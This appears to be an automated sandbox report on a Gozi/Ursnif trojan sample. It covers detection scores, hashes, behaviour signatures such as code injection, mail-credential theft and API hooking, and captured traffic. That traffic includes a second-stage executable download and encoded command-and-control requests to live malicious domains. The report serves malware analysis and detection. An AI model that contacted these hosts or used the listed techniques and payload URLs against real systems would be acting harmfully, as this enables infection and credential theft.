Windows Analysis Report gozi.exe

Overview

General Information

Sample Name:	gozi.exe
Analysis ID:	551701
MD5:	8ee79738c37a919fdf38dc5a621556ce
SHA1:	ae35e761cd1633fa8b70bda3c2e3649c1694ffd1
SHA256:	51037666d1982db93e3123e88594d409805d3f1d970e9f926dcadb99f77f50f6
Tags:	exegozi
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AntiVM3

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Tries to steal Mail credentials (via file / registry access)

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Uses nslookup.exe to query domains

Writes or reads registry keys via WMI

Machine Learning detection for sample

Allocates memory in foreign processes

May check the online IP address of the machine

.NET source code contains potential unpacker

Sigma detected: MSHTA Spawning Windows Shell

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Modifies the export address table of user mode modules (user mode EAT hooks)

Writes registry values via WMI

Writes to foreign memory regions

Changes memory attributes in foreign processes to executable or writable

Uses ping.exe to check the status of other devices and networks

Modifies the prolog of user mode functions (user mode inline hooks)

Uses ping.exe to sleep

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Sigma detected: Mshta Spawning Windows Shell

Modifies the import address table of user mode modules (user mode IAT hooks)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Queries the installation date of Windows

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Searches for the Microsoft Outlook file path

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Compiles C# or VB.Net code

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Rundll32 Activity

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Enables debug privileges

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Csc.exe Source File Folder

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH	Avira URL Cloud: Label: malware
Source: http://apr.intooltak.com/vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: gozi.exe	Virustotal: Detection: 38%	Perma Link
Source: gozi.exe	Metadefender: Detection: 40%	Perma Link
Source: gozi.exe	ReversingLabs: Detection: 65%

Antivirus / Scanner detection for submitted sample

Source: gozi.exe

Avira: detected

Machine Learning detection for sample

Source: gozi.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 8.0.RegAsm.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.32857b4.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 8.0.RegAsm.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.329b084.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_010A7479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

8_2_010A7479

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2

Source: gozi.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
Source:	Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_03F18409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

8_2_03F18409

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	8_2_03F1B9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	8_2_03F0E91D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	8_2_03F22ECF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	47_2_0303E91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	47_2_0304B9D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	47_2_03052ECF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49820 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49820 -> 185.189.12.123:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Domain query: io.immontyr.com

Uses nslookup.exe to query domains

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

May check the online IP address of the machine

Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
Source: global traffic	HTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com

Source: RegAsm.exe, 00000008.00000003.412693608.0000000000E93000.00000004.00000001.sdmp	String found in binary or memory: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cmgR
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.ux2
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.537650333.0000020337C61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: gozi.exe, 00000002.00000002.328074082.0000000003263000.00000004.00000001.sdmp	String found in binary or memory: http://transfer.sh
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/get/3dvhcv/lia.exe
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh4jl

Source: unknown

DNS traffic detected: queries for: transfer.sh

Source: global traffic	HTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443

Source: unknown

